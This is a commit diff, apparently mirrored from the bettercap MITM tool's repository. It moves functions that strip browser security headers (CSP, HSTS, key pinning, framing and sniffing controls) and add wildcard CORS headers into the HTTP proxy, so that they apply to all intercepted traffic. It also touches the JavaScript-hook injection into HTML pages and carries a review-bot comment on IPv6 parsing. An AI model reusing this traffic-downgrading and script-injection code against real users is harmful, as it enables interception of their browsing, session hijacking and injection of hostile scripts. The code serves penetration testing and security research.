mirror of
https://github.com/bettercap/bettercap
synced 2025-08-14 02:36:57 -07:00
fix: fixing request and response headers and downgrading security even if sslstrip is disabled
parent
e650958e8b
commit
3d852a0fae
2 changed files with 34 additions and 38 deletions
|
@ -11,9 +11,19 @@ import (
|
|||
"github.com/elazarl/goproxy"
|
||||
)
|
||||
|
||||
func (p *HTTPProxy) fixRequestHeaders(req *http.Request) {
|
||||
req.Header.Del("Accept-Encoding")
|
||||
req.Header.Del("If-None-Match")
|
||||
req.Header.Del("If-Modified-Since")
|
||||
req.Header.Del("Upgrade-Insecure-Requests")
|
||||
req.Header.Set("Pragma", "no-cache")
|
||||
}
|
||||
|
||||
func (p *HTTPProxy) onRequestFilter(req *http.Request, ctx *goproxy.ProxyCtx) (*http.Request, *http.Response) {
|
||||
log.Debug("(%s) < %s %s %s%s", core.Green(p.Name), req.RemoteAddr, req.Method, req.Host, req.URL.Path)
|
||||
|
||||
p.fixRequestHeaders(req)
|
||||
|
||||
redir := p.stripper.Preprocess(req, ctx)
|
||||
if redir != nil {
|
||||
// we need to redirect the user in order to make
|
||||
|
@ -41,6 +51,25 @@ func (p *HTTPProxy) onRequestFilter(req *http.Request, ctx *goproxy.ProxyCtx) (*
|
|||
return req, nil
|
||||
}
|
||||
|
||||
func (p *HTTPProxy) fixResponseHeaders(res *http.Response) {
|
||||
res.Header.Del("Content-Security-Policy-Report-Only")
|
||||
res.Header.Del("Content-Security-Policy")
|
||||
res.Header.Del("Strict-Transport-Security")
|
||||
res.Header.Del("Public-Key-Pins")
|
||||
res.Header.Del("Public-Key-Pins-Report-Only")
|
||||
res.Header.Del("X-Frame-Options")
|
||||
res.Header.Del("X-Content-Type-Options")
|
||||
res.Header.Del("X-WebKit-CSP")
|
||||
res.Header.Del("X-Content-Security-Policy")
|
||||
res.Header.Del("X-Download-Options")
|
||||
res.Header.Del("X-Permitted-Cross-Domain-Policies")
|
||||
res.Header.Del("X-Xss-Protection")
|
||||
res.Header.Set("Allow-Access-From-Same-Origin", "*")
|
||||
res.Header.Set("Access-Control-Allow-Origin", "*")
|
||||
res.Header.Set("Access-Control-Allow-Methods", "*")
|
||||
res.Header.Set("Access-Control-Allow-Headers", "*")
|
||||
}
|
||||
|
||||
func (p *HTTPProxy) getHeader(res *http.Response, header string) string {
|
||||
header = strings.ToLower(header)
|
||||
for name, values := range res.Header {
|
||||
|
@ -69,11 +98,12 @@ func (p *HTTPProxy) doScriptInjection(res *http.Response, cType string) (error,
|
|||
if err != nil {
|
||||
return err, nil
|
||||
} else if html := string(raw); strings.Contains(html, "</head>") {
|
||||
log.Info("(%s) > injecting javascript (%d bytes) into %s for %s",
|
||||
log.Info("(%s) > injecting javascript (%d bytes) into %s (%d bytes) for %s",
|
||||
core.Green(p.Name),
|
||||
len(p.jsHook),
|
||||
core.Yellow(res.Request.Host+res.Request.URL.Path),
|
||||
core.Bold(res.Request.RemoteAddr))
|
||||
len(raw),
|
||||
core.Bold(strings.Split(res.Request.RemoteAddr, ":")[0]))
|
||||
|
||||
html = strings.Replace(html, "</head>", p.jsHook, -1)
|
||||
newResp := goproxy.NewResponse(res.Request, cType, res.StatusCode, html)
|
||||
|
@ -97,6 +127,8 @@ func (p *HTTPProxy) onResponseFilter(res *http.Response, ctx *goproxy.ProxyCtx)
|
|||
|
||||
log.Debug("(%s) > %s %s %s%s", core.Green(p.Name), res.Request.RemoteAddr, res.Request.Method, res.Request.Host, res.Request.URL.Path)
|
||||
|
||||
p.fixResponseHeaders(res)
|
||||
|
||||
p.stripper.Process(res, ctx)
|
||||
|
||||
// do we have a proxy script?
|
||||
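Review bot: In doScriptInjection, the new log argument `strings.Split(res.Request.RemoteAddr, ":")[0]` mis-parses an IPv6 peer, because a bracketed address (e.g. a constructed `[::1]:1234`) splits to `[`; `host, _, _ := net.SplitHostPort(res.Request.RemoteAddr)` handles both address families, and needs `net` imported if the file does not already have it. The body of doScriptInjection starts and ends outside the hunk. Separately, fixRequestHeaders and fixResponseHeaders have no doc comments, and the calls added in onRequestFilter and onResponseFilter show no enabled-check in these hunks, so the header removal and wildcard CORS headers appear to apply to all proxied traffic. A comment such as `// fixResponseHeaders removes browser security headers (CSP, HSTS, HPKP, framing and sniffing controls) and sets wildcard CORS headers on every response, independent of sslstrip.` would make that scope explicit for operators.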
|
|
|
@ -192,35 +192,6 @@ func (s *SSLStripper) Enable(enabled bool) {
|
|||
}
|
||||
}
|
||||
|
||||
func (s *SSLStripper) stripRequestHeaders(req *http.Request) {
|
||||
req.Header.Del("Accept-Encoding")
|
||||
req.Header.Del("If-None-Match")
|
||||
req.Header.Del("If-Modified-Since")
|
||||
req.Header.Del("Upgrade-Insecure-Requests")
|
||||
|
||||
req.Header.Set("Pragma", "no-cache")
|
||||
}
|
||||
|
||||
func (s *SSLStripper) stripResponseHeaders(res *http.Response) {
|
||||
res.Header.Del("Content-Security-Policy-Report-Only")
|
||||
res.Header.Del("Content-Security-Policy")
|
||||
res.Header.Del("Strict-Transport-Security")
|
||||
res.Header.Del("Public-Key-Pins")
|
||||
res.Header.Del("Public-Key-Pins-Report-Only")
|
||||
res.Header.Del("X-Frame-Options")
|
||||
res.Header.Del("X-Content-Type-Options")
|
||||
res.Header.Del("X-WebKit-CSP")
|
||||
res.Header.Del("X-Content-Security-Policy")
|
||||
res.Header.Del("X-Download-Options")
|
||||
res.Header.Del("X-Permitted-Cross-Domain-Policies")
|
||||
res.Header.Del("X-Xss-Protection")
|
||||
|
||||
res.Header.Set("Allow-Access-From-Same-Origin", "*")
|
||||
res.Header.Set("Access-Control-Allow-Origin", "*")
|
||||
res.Header.Set("Access-Control-Allow-Methods", "*")
|
||||
res.Header.Set("Access-Control-Allow-Headers", "*")
|
||||
}
|
||||
|
||||
func (s *SSLStripper) isContentStrippable(res *http.Response) bool {
|
||||
for name, values := range res.Header {
|
||||
for _, value := range values {
|
||||
|
@ -258,7 +229,6 @@ func (s *SSLStripper) processURL(url string) string {
|
|||
|
||||
// sslstrip preprocessing, takes care of:
|
||||
//
|
||||
// - patching / removing security related headers
|
||||
// - handling stripped domains
|
||||
// - making unknown session cookies expire
|
||||
func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redir *http.Response) {
|
||||
|
@ -266,9 +236,6 @@ func (s *SSLStripper) Preprocess(req *http.Request, ctx *goproxy.ProxyCtx) (redi
|
|||
return
|
||||
}
|
||||
|
||||
// preprocess request headers
|
||||
s.stripRequestHeaders(req)
|
||||
|
||||
// well ...
|
||||
if req.URL.Scheme == "https" {
|
||||
// TODO: check for max redirects?
|
||||
|
@ -349,9 +316,6 @@ func (s *SSLStripper) Process(res *http.Response, ctx *goproxy.ProxyCtx) {
|
|||
}
|
||||
}
|
||||
|
||||
// process response headers
|
||||
s.stripResponseHeaders(res)
|
||||
|
||||
// if we have a text or html content type, fetch the body
|
||||
// and perform sslstripping
|
||||
if s.isContentStrippable(res) {
|
||||
|
|